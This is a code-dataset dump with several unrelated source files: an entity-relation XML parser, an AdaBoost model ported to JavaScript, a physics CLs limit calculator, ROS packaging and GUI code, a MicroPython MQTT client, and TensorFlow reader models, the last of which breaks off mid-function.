index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
19,200 | 3282c379876db50db99d6129fc0e660c6e7246b9 | import os , sys
import numpy as np
import pdb
import random
import fitlog
from .base import *
#fitlog.commit(__file__)
def parse_a_text_file(logger , cont , dirty = False):
'''看起来还行'''
cont = cont.split("<doc>")[1].split("</doc>")[0] #去掉<doc>之前的和</doc>之后的内容
cont = filter(lambda x : x , cont.strip().split("</text>"))
datas = {}
for x in cont:
try:
x = x.strip().replace("\n" , " ").replace("\t" , " ")
x = x[10:] #remove <text id=\"
assert '"' in x, "the quote sign is not in text string"
text_id, x = x.split('"', 1)
x = '"' + x
#text_id , x = x[:8] , x[8:] #text id 一定是XXX-XXXX
x = x.split("<title>")[1].strip() #remove <title>
title , x = x.split("</title>")
while "</entity>" in title: #remove entity in title
title = title.split("<entity id=\"" , 1)[0] + " " + title.split("\">" , 1)[1]
title = title.replace("</entity>" , "" , 1)
title = " ".join(list(filter(lambda x : x , title.strip().split(" ")))) #去掉多余空格
x = x.split("<abstract>")[1].strip().split("</abstract>")[0].strip() #remove <abstract> , <\abstract>
ents = []
while "</entity>" in x:
ent_id = x.split("<entity id=\"" , 1)[1].split("\">" , 1)[0]
ent_head = "<entity id=\"%s\">" % ent_id
ent_start = x.find(ent_head)
x = x.replace(ent_head , "" , 1)
ent_end = x.find("</entity>")
x = x.replace("</entity>" , "" , 1)
while x[ent_start] == " ": #实体名带空格
ent_start += 1
while x[ent_end-1] == " ": #实体名带空格
ent_end -= 1
if not (ent_start == 0 or x[ent_start-1] == " "): #实体名在一串字符中间
x = x[ : ent_start] + " " + x[ent_start : ]
ent_start += 1
ent_end += 1
if not (ent_end == len(x) or x[ent_end] == " "): #实体名在一串字符中间
x = x[ : ent_end] + " " + x[ent_end : ]
assert ent_start >= 0 and ent_end >= 0
ents.append(Entity(ent_start , ent_end , name = ent_id))
assert x.find("<entity") < 0 and x.find("</entity>") < 0
assert len(ents) > 0
rem_ent = []
for e in ents:
try:
assert (e.s == 0 or x[e.s-1] == " ") and x[e.s] != " "
assert (e.e == len(x) or x[e.e] == " ") and x[e.e-1] != " "
except AssertionError:
rem_ent.append(e)
except IndexError:
if dirty:
assert False #直接扔掉这实例
rem_ent.append(e)
if len(rem_ent) > 0:
if dirty:
assert False #直接扔掉这实例
logger.log ("Bad entity showed. in %s" % e.name)
for e in rem_ent:
#drop that
ents.remove(e)
abstract = x
datas[text_id] = Data(
text_id = text_id ,
title = title ,
abstract = abstract ,
ents = ents ,
)
except Exception:
# if error occured , give up this data sample.
if not dirty: #but not for clean data
pdb.set_trace()
return datas
def parse_a_key_file(logger , datas , cont , dtype = "test"):
relations = []
cont = cont.strip().split("\n")
for x in cont:
rel , x = x.strip().split("(")
x = x.split(")")[0] #去掉末尾)
next_ = x.split(",")
if len(next_) == 3:
assert next_[2] == "REVERSE"
ent_b , ent_a = next_[:2]
else:
ent_a , ent_b = next_[:2]
text_id = ent_a.split(".")[0]
try:
assert ent_b.split(".")[0] == text_id
except AssertionError:
pdb.set_trace()
if datas.get(text_id) is None:
# data dropped
continue
if not ent_a in datas[text_id].ent_names or not ent_b in datas[text_id].ent_names:
# entity not in data (entity dropped in title)
continue
datas[text_id].ans.append(Relation(ent_a , ent_b , rel))
if dtype == "train":
if rel == "COMPARE":
datas[text_id].ans.append(Relation(ent_b , ent_a , rel))
relations.append(rel)
return datas, relations
def file_content2data(
C , logger ,
train_text_1 , train_rels_1 ,
train_text_2 , train_rels_2 ,
test_text , test_rels ,
valid_text , valid_rels ,
dataset_type , rel_weight_smooth , rel_weight_norm , verbose = True
):
#----- read data files -----
train_data_1 = parse_a_text_file(logger , train_text_1 , dirty = False)
train_data_1 , rel_list1 = parse_a_key_file (logger , train_data_1 , train_rels_1 , dtype = "train")
train_data_2 = parse_a_text_file(logger , train_text_2 , dirty = True)
train_data_2 , rel_list2 = parse_a_key_file (logger , train_data_2 , train_rels_2 , dtype = "train")
train_data = train_data_1
train_data.update(train_data_2)
test_data = parse_a_text_file(logger , test_text)
test_data , rel_list3 = parse_a_key_file (logger , test_data , test_rels , dtype = "test")
valid_data = parse_a_text_file(logger , valid_text)
valid_data , rel_list4 = parse_a_key_file (logger , valid_data , valid_rels , dtype = "test")
rel_list = rel_list1 + rel_list2 + rel_list3 + rel_list4
#make datas list
train_data = [d for _ , d in train_data.items()]
test_data = [d for _ , d in test_data.items()]
valid_data = [d for _ , d in valid_data.items()]
return data_process(
C , logger ,
train_data , test_data , valid_data , rel_list ,
dataset_type , rel_weight_smooth , rel_weight_norm , verbose ,
)
def read_data(
C , logger ,
file_train_text_1 , file_train_rels_1 ,
file_train_text_2 , file_train_rels_2 ,
file_test_text , file_test_rels ,
file_valid_text , file_valid_rels ,
dataset_type , rel_weight_smooth , rel_weight_norm ,
):
train_text_1 = get_file_content(file_train_text_1)
train_rels_1 = get_file_content(file_train_rels_1)
train_text_2 = get_file_content(file_train_text_2)
train_rels_2 = get_file_content(file_train_rels_2)
test_text = get_file_content(file_test_text)
test_rels = get_file_content(file_test_rels)
valid_text = get_file_content(file_valid_text)
valid_rels = get_file_content(file_valid_rels)
return file_content2data(
C , logger ,
train_text_1 , train_rels_1 ,
train_text_2 , train_rels_2 ,
test_text , test_rels ,
valid_text , valid_rels ,
dataset_type , rel_weight_smooth , rel_weight_norm ,
)
if __name__ == "__main__":
from config import C
read_data(C.train_text , C.train_rels , C.test_text , C.test_rels) |
19,201 | 42fbc0e990ca6d4741d64f778eec9856a69f7add | # -*- coding: utf-8 -*-
from sklearn.datasets import load_iris
from sklearn.ensemble import AdaBoostClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn_porter import Porter
iris_data = load_iris()
X, y = iris_data.data, iris_data.target
base_estimator = DecisionTreeClassifier(max_depth=4, random_state=0)
clf = AdaBoostClassifier(base_estimator=base_estimator, n_estimators=100,
random_state=0)
clf.fit(X, y)
# Cheese!
result = Porter(language='js').port(clf)
print(result)
"""
var Tmp = function(atts) {
var predict_0 = function(atts) {
var classes = new Array(3);
if (atts[3] <= 0.80000001192092896) {
classes[0] = 0.33333333333333298;
classes[1] = 0.0;
classes[2] = 0.0;
} else {
if (atts[3] <= 1.75) {
if (atts[2] <= 4.9499998092651367) {
if (atts[3] <= 1.6500000953674316) {
classes[0] = 0.0;
classes[1] = 0.31333333333333302;
classes[2] = 0.0;
} else {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.0066666666666666671;
}
} else {
if (atts[3] <= 1.5499999523162842) {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.02;
} else {
classes[0] = 0.0;
classes[1] = 0.013333333333333334;
classes[2] = 0.0066666666666666671;
}
}
} else {
if (atts[2] <= 4.8500003814697266) {
if (atts[0] <= 5.9499998092651367) {
classes[0] = 0.0;
classes[1] = 0.0066666666666666671;
classes[2] = 0.0;
} else {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.013333333333333334;
}
} else {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.2866666666666664;
}
}
}
return classes;
};
var predict_1 = function(atts) {
var classes = new Array(3);
if (atts[2] <= 5.1499996185302734) {
if (atts[2] <= 2.4500000476837158) {
classes[0] = 8.3290724464028397e-05;
classes[1] = 0.0;
classes[2] = 0.0;
} else {
if (atts[3] <= 1.75) {
if (atts[0] <= 4.9499998092651367) {
classes[0] = 0.0;
classes[1] = 1.6658144892805682e-06;
classes[2] = 1.6658144892805682e-06;
} else {
classes[0] = 0.0;
classes[1] = 0.4999541901015449;
classes[2] = 3.3316289785611363e-06;
}
} else {
if (atts[1] <= 3.1500000953674316) {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 1.9989773871366814e-05;
} else {
classes[0] = 0.0;
classes[1] = 1.6658144892805682e-06;
classes[2] = 1.6658144892805682e-06;
}
}
}
} else {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.4999325345131842;
}
return classes;
};
var predict_2 = function(atts) {
var classes = new Array(3);
if (atts[3] <= 1.5499999523162842) {
if (atts[2] <= 4.9499998092651367) {
if (atts[3] <= 0.80000001192092896) {
classes[0] = 2.6788177186451792e-08;
classes[1] = 0.0;
classes[2] = 0.0;
} else {
classes[0] = 0.0;
classes[1] = 0.00018473109499329488;
classes[2] = 0.0;
}
} else {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.49969664310232625;
}
} else {
if (atts[2] <= 5.1499996185302734) {
if (atts[3] <= 1.8499999046325684) {
if (atts[0] <= 5.4000000953674316) {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.00011147301524887026;
} else {
classes[0] = 0.0;
classes[1] = 0.49973485750206614;
classes[2] = 2.6788177186451756e-09;
}
} else {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.00011147676559367639;
}
} else {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.00016078905277695348;
}
}
return classes;
};
var predict_3 = function(atts) {
var classes = new Array(3);
if (atts[3] <= 1.75) {
if (atts[3] <= 1.5499999523162842) {
if (atts[2] <= 4.9499998092651367) {
if (atts[3] <= 0.80000001192092896) {
classes[0] = 9.2576539737627342e-11;
classes[1] = 0.0;
classes[2] = 0.0;
} else {
classes[0] = 0.0;
classes[1] = 6.384072136521275e-07;
classes[2] = 0.0;
}
} else {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.0017268881646907192;
}
} else {
if (atts[0] <= 6.9499998092651367) {
if (atts[1] <= 2.5999999046325684) {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 3.8523658978481932e-07;
} else {
classes[0] = 0.0;
classes[1] = 0.49902423425502029;
classes[2] = 0.0;
}
} else {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 5.5560730608384753e-07;
}
}
} else {
if (atts[1] <= 3.1500000953674316) {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.49913557364140265;
} else {
if (atts[2] <= 4.9499998092651367) {
classes[0] = 0.0;
classes[1] = 0.00011133933639195673;
classes[2] = 0.0;
} else {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 3.8525880815435657e-07;
}
}
}
return classes;
};
this.predict = function(atts) {
var n_estimators = 4,
preds = new Array(n_estimators),
n_classes = 3,
classes = new Array(n_classes),
normalizer, sum, idx, val,
i, j;
preds[0] = predict_0(atts);
preds[1] = predict_1(atts);
preds[2] = predict_2(atts);
preds[3] = predict_3(atts);
for (i = 0; i < n_estimators; i++) {
normalizer = 0.;
for (j = 0; j < n_classes; j++) {
normalizer += preds[i][j];
}
if (normalizer == 0.) {
normalizer = 1.0;
}
for (j = 0; j < n_classes; j++) {
preds[i][j] = preds[i][j] / normalizer;
if (preds[i][j] < 2.2250738585072014e-308) {
preds[i][j] = 2.2250738585072014e-308;
}
preds[i][j] = Math.log(preds[i][j]);
}
sum = 0.0;
for (j = 0; j < n_classes; j++) {
sum += preds[i][j];
}
for (j = 0; j < n_classes; j++) {
preds[i][j] = (n_classes - 1) * (preds[i][j] - (1. / n_classes) * sum);
}
}
for (i = 0; i < n_classes; i++) {
classes[i] = 0.0;
}
for (i = 0; i < n_estimators; i++) {
for (j = 0; j < n_classes; j++) {
classes[j] += preds[i][j];
}
}
idx = -1;
val = Number.NEGATIVE_INFINITY;
for (i = 0; i < n_classes; i++) {
if (classes[i] > val) {
idx = i;
val = classes[i];
}
}
return idx;
};
};
if (typeof process !== 'undefined' && typeof process.argv !== 'undefined') {
if (process.argv.length - 2 == 4) {
var argv = process.argv.slice(2);
var prediction = new Tmp().predict(argv);
console.log(prediction);
}
}
"""
|
19,202 | 48e9d1f8adab34255e7ae5a18bea78c364f6df25 | #!/usr/bin/env python
import os
import ROOT
import matplotlib.pyplot as plt
plt.rc('text', usetex=True)
plt.rc('font', family='serif')
plt.locator_params(axis='y', nticks=10)
from scipy import interpolate
import numpy as np
class ToyReader:
def __init__(self, mass, toy_dir, data_input, poi_list):
self.toy_dir = toy_dir
self.data_input = data_input
self.poi_name = "mu_ggF"
self.poi_vals = poi_list
self.poi_list = ["{:.2f}".format(x) for x in poi_list]
self.pattern = "toys_mH{}_{}".format(mass, self.poi_name)
self.mass = mass
self.read_data()
def toy_output_pattern(self, _str):
self.pattern = _str
def get_p0(self, nll_list, nll):
total = len(nll_list)
larger = len([x for x in nll_list if x > nll])
return larger*1.0/total
def get_cls(self, nll_sb, nll_bonly, nll):
clsb = self.get_p0(nll_sb, nll)
clb = self.get_p0(nll_bonly,nll)
return clsb/clb
def read_data(self):
f_data = ROOT.TFile.Open(self.data_input)
tree = f_data.Get("physics")
self.obs_nll_dic = {}
entries = tree.GetEntries()
if entries != len(self.poi_list):
print "entries in observed does not match the one in poi list"
print entries, len(self.poi_list)
print "--------------------------"
if entries < len(self.poi_list):
return
for ientry in range(entries):
tree.GetEntry(ientry)
nll = 2 * (tree.nll_SB_fixed - tree.nll_SB_free)
self.obs_nll_dic["{:.2f}".format(tree.mu)] = nll
f_data.Close()
self.obs_nll_dic
def read_toys(self, poi):
chain = ROOT.TChain("physics", "physics")
chain.Add(os.path.join(self.toy_dir, self.pattern+poi+"_seed*root"))
nentries = chain.GetEntries()
print "total entries for: ",poi,nentries
nll_sb = []
nll_bonly = []
for ientry in range(nentries):
chain.GetEntry(ientry)
nll_sb.append(2*(chain.nll_SB_fixed - chain.nll_SB_free))
nll_bonly.append(2*(chain.nll_B_fixed - chain.nll_SB_free))
return nll_sb, nll_bonly
def process(self):
cls_list = []
for poi in self.poi_list:
nll_sb, nll_bonly = self.read_toys(poi)
obs_nll = self.obs_nll_dic[poi]
cls = self.get_cls(nll_sb, nll_bonly, obs_nll)
cls_list.append(cls)
#bins, edges = np.histogram(nll_sb, 20)
#plt.plot(edges, bins, 'o')
nbins = 30
plt.hist(nll_sb, bins=nbins, range=(-5, 35))
plt.hist(nll_bonly, bins=nbins, histtype='step', range=(-5, 35))
plt.plot([obs_nll, obs_nll], plt.ylim(), 'r-', lw=2)
plt.savefig('mH_{}_nll_{}.png'.format(self.mass, poi))
plt.close()
for x,y in zip(self.poi_vals, cls_list):
print x,y
f = interpolate.interp1d(self.poi_vals, cls_list, 'quadratic', bounds_error=False)
new_poi = np.arange(self.poi_vals[0]-0.1, self.poi_vals[-1]+0.1, 0.005)
new_cls = f(new_poi)
# find the poi that yields the cls that is close to 0.05
limit = 0.
min_dis = 999
for x, y in zip(new_poi, new_cls):
if abs(y - 0.05) < min_dis:
min_dis = abs(y - 0.05)
limit = x
print "limits:", limit
plt.plot(self.poi_vals, cls_list, 'o', new_poi, new_cls, '-')
plt.xlabel('mu')
plt.ylabel('CLs')
plt.savefig('mH_{}_cls_test.png'.format(self.mass))
plt.close()
if __name__ == "__main__":
mass_dic = {
# 1600: [6.5, 7.5, 8.5],
# 1800: [15.0, 17.0, 19.0],
2000: [38, 42, 46]
}
for mass, poi_list in mass_dic.iteritems():
reader = ToyReader(mass, "data", 'observed_q_{}.root'.format(mass), poi_list)
reader.process()
|
19,203 | 4b0689764e7dcc6c5dd1c6ef35d8ede579ef19fb | import glob
import os.path
from setuptools import setup
from setuptools import find_packages
package_name = 'wolfgang_robocup_api'
setup(
name=package_name,
packages=find_packages(),
data_files=[
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
(os.path.join('share', package_name), ['package.xml']),
(os.path.join('share', package_name, 'config'), ['config/devices.json']),
(os.path.join('share', package_name, 'launch'), glob.glob('launch/*.launch')),
],
install_requires=[
'launch',
'setuptools',
],
zip_safe=True,
keywords=['ROS'],
license='MIT',
entry_points={
'console_scripts': [
f'command_proxy = {package_name}.command_proxy:main',
],
},
)
|
19,204 | 62e333eb157a5ca0689bc3e5b186b10338dcdcf3 | import string
my_text = input('enter something: ')
shift = 3
alphabet = string.ascii_lowercase
shifted = alphabet[shift:] + alphabet[:shift]
table = str.maketrans(alphabet, shifted)
after_translatation = str.translate(my_text, table)
print(after_translatation)
|
19,205 | b805301a101aabb52d616dfe2d6a9ca3a8a57510 | # Software License Agreement
__version__ = "0.0.1"
__status__ = "Production"
__license__ = "BSD"
__copyright__ = "Copyright (c) 2015, P.A.N.D.O.R.A. Team. All rights reserved."
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of P.A.N.D.O.R.A. Team nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
__author__ = "Chamzas Konstantinos"
__maintainer__ = "Chamzas Konstantinos"
__email__ = "chamzask@gmail.com"
import os
import rospkg
from python_qt_binding import loadUi
from python_qt_binding.QtCore import Slot, QTimer
from python_qt_binding.QtGui import QWidget
from pandora_sensor_msgs.msg import BatteryMsg
from .widget_info import WidgetInfo
battery_topic = "sensors/battery"
class BatteryWidget(QWidget):
"""
BatteryWidget.start must be called in order to update topic pane.
"""
def __init__(self, plugin=None):
super(BatteryWidget, self).__init__()
# Load Ui and name the widget
self.id_ = "Battery"
rp = rospkg.RosPack()
ui_file = os.path.join(
rp.get_path('pandora_rqt_gui'),
'resources', 'BatteryWidget.ui')
loadUi(ui_file, self)
# create the subcribers
self.widget_info_batteries = WidgetInfo(battery_topic, BatteryMsg)
# create and connect the timer
self.timer_refresh_widget = QTimer(self)
self.timer_refresh_widget.timeout.connect(self.refresh_topics)
def start(self):
self.widget_info_batteries.start_monitoring()
self.timer_refresh_widget.start(100)
# Connected slot to the timer in order to refresh
@Slot()
def refresh_topics(self):
if self.widget_info_batteries.last_message is not None:
self.lcd1.display(
self.widget_info_batteries.last_message.voltage[0])
self.lcd2.display(
self.widget_info_batteries.last_message.voltage[1])
self.PSUBatteryBar.setValue(
(self.widget_info_batteries.last_message.voltage[0] - 19) * 20)
self.MotorBatteryBar.setValue(
(self.widget_info_batteries.last_message.voltage[1] - 19) * 20)
# Method called when the Widget is terminated
def shutdown(self):
self.widget_info_batteries.stop_monitoring()
self.timer_refresh_widget.stop()
|
19,206 | a7d20d722a9fc6585996e86ac584b54fb269293e | ################################################################################
# filename: user_mqtt.py
# date: 07. Oct. 2020
# username: winkste
# name: Stephan Wink
# description: This module controls the MQTT client and the subscriptions to it
#
################################################################################
################################################################################
# Imports
from umqtt.simple import MQTTClient
from umqtt.simple import MQTTException
from time import sleep
from src.mqtt.user_subs import UserSubs
from src.mqtt.user_subs import set_mqtt_subscribe_cb
from src.mqtt.user_pubs import UserPubs
from src.mqtt.user_pubs import set_mqtt_publish_cb
################################################################################
# Variables
# client object singleton
client = None
################################################################################
# Functions
################################################################################
# @brief Initializes the mqtt client and connects to the mqtt broker
# @param id client id
# @param ip broker ip address
# @param port broker ip port
# @param user broker user identifier
# @param pwd broker user password
# @return none
################################################################################
def start_mqtt_client(id, ip, port, user, pwd):
global client
print(id, ip, port, user, pwd)
client = UserMqtt(id, ip, port, user, pwd)
try:
client.set_callback(subs_callback)
client.connect()
set_mqtt_subscribe_cb(subscribe)
set_mqtt_publish_cb(publish)
except AttributeError:
print('mqtt client allocation failed...')
except MQTTException:
print('mqtt connection error...')
################################################################################
# @brief Stops the mqtt client and disconnects from the mqtt broker
# @return none
################################################################################
def stop_mqtt_client():
global client
try:
client.disconnect()
client = None
except AttributeError:
print('mqtt client allocation failed...')
except MQTTException:
print('mqtt connection error...')
################################################################################
# @brief using the mqtt client singleton, this function publishes a messsage
# @param topic topic identifier of the messsage
# @param payload payload of the message
# @return none
################################################################################
def publish(topic, payload):
global client
byte_topic = topic.encode('utf-8')
byte_payload = payload.encode('utf-8')
try:
client.publish(byte_topic, byte_payload)
except AttributeError:
print('mqtt client not allocated...')
except OSError:
print('mqtt connection error in publish...')
################################################################################
# @brief Callback function for incoming subscriptions
# @param topic topic identifier of the messsage
# @param payload payload of the message
# @return none
################################################################################
def subs_callback(topic, data):
print('Topic received:', topic)
print('Data received:', data)
topic_string = topic.decode('utf-8')
data_string = data.decode('utf-8')
client.check_subscriptions(topic_string, data_string)
################################################################################
# @brief This function subscribes for a topic and registers a callback
# function to be called when the topic arrives
# @param topic topic identifier of the messsage
# @param cb_func callback function when topic arrives
# @return none
################################################################################
def subscribe(user_subs):
global client
try:
client.subscribe(user_subs)
except AttributeError:
print('mqtt client not allocated...')
except OSError:
print('mqtt connection error in subscribe...')
################################################################################
# @brief This function prints all registered subsciptions
# @return none
################################################################################
def print_all_subscriptions():
global client
client.print_all_subscriptions()
################################################################################
# @brief This function checks non blocking for an MQTT incoming message
# and processes it
# @return none
################################################################################
def check_non_blocking_for_msg():
global client
try:
client.check_non_blocking_for_msg()
return True
except AttributeError:
print('mqtt client not allocated...')
return False
except OSError:
print('mqtt connection error in check_non_blocking_for_msg...')
return False
################################################################################
# Classes
################################################################################
# @brief This class handles the mqtt connection and organizes all
# registered subscriptions
################################################################################
class UserMqtt:
############################################################################
# Member Attributes
client_id = ''
broker_ip = ''
broker_port = ''
broker_user = ''
broker_pwd = ''
subscriptions = []
mqtt_client = None
subs_cb = None
############################################################################
# Member Functions
############################################################################
# @brief initializes the mqtt client
# @param client_id client id
# @param broker_ip broker ip address
# @param broker_port broker ip port
# @param user_account broker user identifier
# @param user_pwd broker user password
# @return none
############################################################################
def __init__(self, client_id, broker_ip, broker_port, user_account,
user_pwd):
self.client_id = client_id
self.broker_ip = broker_ip
self.broker_port = broker_port
self.broker_user = user_account
self.broker_pwd = user_pwd
self.mqtt_client = MQTTClient(self.client_id, self.broker_ip,
self.broker_port, self.broker_user,
self.broker_pwd)
############################################################################
# @brief Connects the configured client with the mqtt broker
# @return none
############################################################################
def connect(self):
self.mqtt_client.connect()
############################################################################
# @brief Disconnects the configured client from the mqtt broker
# @return none
############################################################################
def disconnect(self):
self.mqtt_client.disconnect()
############################################################################
# @brief This function sets the subscription callback function
# @param subs_cb subscription callback function
# @return none
############################################################################
def set_callback(self, subs_cb):
self.subs_cb = subs_cb
self.mqtt_client.set_callback(self.subs_cb)
############################################################################
# @brief This function publishes a MQTT message if the client is
# connected to a broker
# @param topic topic identifier of the messsage
# @param payload payload of the message
# @return none
############################################################################
def publish(self, topic, payload):
self.mqtt_client.publish(topic, payload)
############################################################################
# @brief This function subscribes for a topic message and registers a
# callback function
# @param user_subs user subscription object including the topic and
# callback
# @return none
############################################################################
def subscribe(self, user_subs):
self.subscriptions.append(user_subs)
self.mqtt_client.subscribe(user_subs.topic)
############################################################################
# @brief This function subscribes for a topic message and registers a
# callback function
# @param topic topic identifier of the messsage
# @param cb_func callback function when topic arrives
# @return none
############################################################################
def check_subscriptions(self, topic, payload):
for obj in self.subscriptions:
if topic == obj.topic:
obj.callback_on_arrived_topic(topic, payload)
############################################################################
# @brief This function prints all registered subsciptions
# @return none
############################################################################
def print_all_subscriptions(self):
for obj in self.subscriptions:
print(obj.topic)
############################################################################
# @brief Checks non blocking if any incoming subscriptions need to be
# processed
# @return none
############################################################################
def check_non_blocking_for_msg(self):
self.mqtt_client.check_msg()
################################################################################
# Scripts
if __name__ == "__main__":
print("--- user_mqtt test script ---")
|
19,207 | 27367966824683746fcfa6f5e5337ba250f7c9ac | # -*- coding: utf-8 -*-
import tensorflow as tf
from jtr.nn.models import get_total_trainable_variables, get_total_variables, predictor
def key_value_reader(inputs, lengths, output_size, contexts=(None, None),
scope=None, drop_keep_prob=1.0, project_fw_bw=True):
with tf.variable_scope(scope or "key_value_reader") as varscope:
cell = tf.nn.rnn_cell.LSTMCell(
output_size,
state_is_tuple=True,
initializer=tf.contrib.layers.xavier_initializer()
)
if drop_keep_prob != 1.0:
cell = tf.nn.rnn_cell.DropoutWrapper(
cell=cell,
output_keep_prob=drop_keep_prob
)
# [batch_size x seq_length x output_size], ?
outputs, states = tf.nn.bidirectional_dynamic_rnn(
cell,
cell,
inputs,
sequence_length=lengths,
initial_state_fw=contexts[0],
initial_state_bw=contexts[1],
dtype=tf.float32
)
outputs_fw, outputs_bw = outputs
outputs_fw_key, outputs_fw_val = tf.split(outputs_fw, 2, 2)
outputs_bw_key, outputs_bw_val = tf.split(outputs_bw, 2, 2)
outputs_key = tf.concat([outputs_fw_key, outputs_bw_key], 2)
outputs_val = tf.concat([outputs_fw_val, outputs_bw_val], 2)
if project_fw_bw:
outputs_key = tf.contrib.layers.fully_connected(
outputs_key, output_size, activation_fn=tf.tanh)
outputs_val = tf.contrib.layers.fully_connected(
outputs_val, output_size, activation_fn=tf.tanh)
# outputs_key/outputs_val: [batch_size x max_length x output_size]
return (outputs_key, outputs_val), states
def mutable_attention(memory_states, input, input_lengths,
output_size, scope=None):
with tf.variable_scope(scope or "mutable_attention") as varscope1:
batch_size = tf.shape(input)[0]
max_time = tf.shape(input)[1]
input_depth = int(input.get_shape()[2])
# transforming input to time major
input_major = tf.transpose(input, [1, 0, 2])
num_units = output_size
# fixme: very hacky and costly way
input_lengths_cast = tf.cast(input_lengths, tf.int32)
inputs_ta = tf.TensorArray(dtype=tf.float32, size=max_time)
inputs_ta = inputs_ta.unpack(input_major)
# attention controller
cell = tf.nn.rnn_cell.LSTMCell(num_units)
#attention_states_fw, attention_states_bw = tf.split(memory_states, 2, 0)
#attention_states = tf.concat([attention_states_fw,
attention_states_bw], 3)
#attention_states = tf.squeeze(attention_states, [0])
memory_key, memory_val = memory_states
# transforming attention states time major
memory_key_major = tf.transpose(memory_key, [1, 0, 2])
memory_val_major = tf.transpose(memory_val, [1, 0, 2])
attention_states = tf.contrib.layers.linear(memory_key_major, num_units)
att_len = tf.shape(attention_states)[0]
def loop_fn(time, cell_output, cell_state, loop_state):
emit_output = cell_output # == None for time == 0
if cell_output is None: # time == 0
next_cell_state = cell.zero_state(batch_size, tf.float32)
else:
next_cell_state = cell_state
elements_finished = (time >= input_lengths_cast)
c, query = next_cell_state
## Working with memory keys
# [att_len x batch_size x num_units]
query_expanded = tf.tile(tf.expand_dims(query, 0), [att_len, 1, 1])
attention_states_projected = \
tf.contrib.layers.linear(attention_states, num_units)
query_projected = \
tf.contrib.layers.linear(query_expanded, num_units)
# [att_len x batch_size x num_units]
M = tf.tanh(attention_states_projected + query_projected)
# [batch_size x att_len]
logits = tf.transpose(tf.squeeze(tf.contrib.layers.linear(M, 1)))
# [att_len x batch_size]
alpha = tf.transpose(tf.nn.softmax(logits))
## Working with memory vals
attention_states_flat = tf.reshape(memory_val_major, [-1, num_units])
alpha_flat = tf.reshape(alpha, [-1, 1])
# todo: so far only read operation! also use write operation!
# [batch_size x num_units]
r = attention_states_flat * alpha_flat
r_reshaped = tf.reduce_sum(
tf.reshape(r, [att_len, batch_size, num_units]), [0])
# [batch_size x num_units]
h = tf.tanh(tf.contrib.layers.linear(
tf.concat([query, r_reshaped], 1), num_units))
next_cell_state = tf.nn.rnn_cell.LSTMStateTuple(c, h)
finished = tf.reduce_all(elements_finished)
next_input = tf.cond(
finished,
lambda: tf.zeros([batch_size, input_depth], dtype=tf.float32),
lambda: inputs_ta.read(time))
next_loop_state = None
return (elements_finished, next_input, next_cell_state,
emit_output, next_loop_state)
outputs_ta, final_state, _ = tf.nn.raw_rnn(cell, loop_fn)
outputs = outputs_ta.pack()
outputs_batch_major = tf.transpose(outputs, [1, 0, 2])
# each [batch_size x max_seq_length x output_size]
return outputs_batch_major, final_state
def key_value_rte(placeholders, nvocab, **options):
"""
Bidirectional conditional reader with pairs of (question, support)
placeholders: dictionary that should contain placeholders for at least the following keys:
"question"
"question_length"
"support"
"support_length"
"answers"
"""
# [batch_size, max_seq1_length]
premise = placeholders['question']
# [batch_size]
premise_lengths = placeholders["question_lengths"]
# [batch_size, max_seq2_length]
hypothesis = placeholders["support"]
# [batch_size]
hypothesis_lengths = placeholders["support_lengths"]
# [batch_size]
targets = placeholders["answers"]
output_size = options["repr_dim_output"]
with tf.variable_scope("embedders") as varscope:
premise_embedded = nvocab(premise)
varscope.reuse_variables()
hypothesis_embedded = nvocab(hypothesis)
# todo: add option for attentive reader
print('TRAINABLE VARIABLES (only embeddings): %d' % get_total_trainable_variables())
with tf.variable_scope("key_value_readers") as varscope:
premise_outputs, _ = \
key_value_reader(premise_embedded, premise_lengths, output_size,
contexts=(None, None), scope=None,
drop_keep_prob=options["drop_keep_prob"],
project_fw_bw=True)
varscope.reuse_variables()
hypothesis_outputs, _ = \
key_value_reader(hypothesis_embedded, hypothesis_lengths, output_size,
contexts=(None, None), scope=None,
drop_keep_prob=options["drop_keep_prob"],
project_fw_bw=True)
# Reading premise with memory of hypothesis
#premise_outputs_processed, premise_state = mutable_attention(
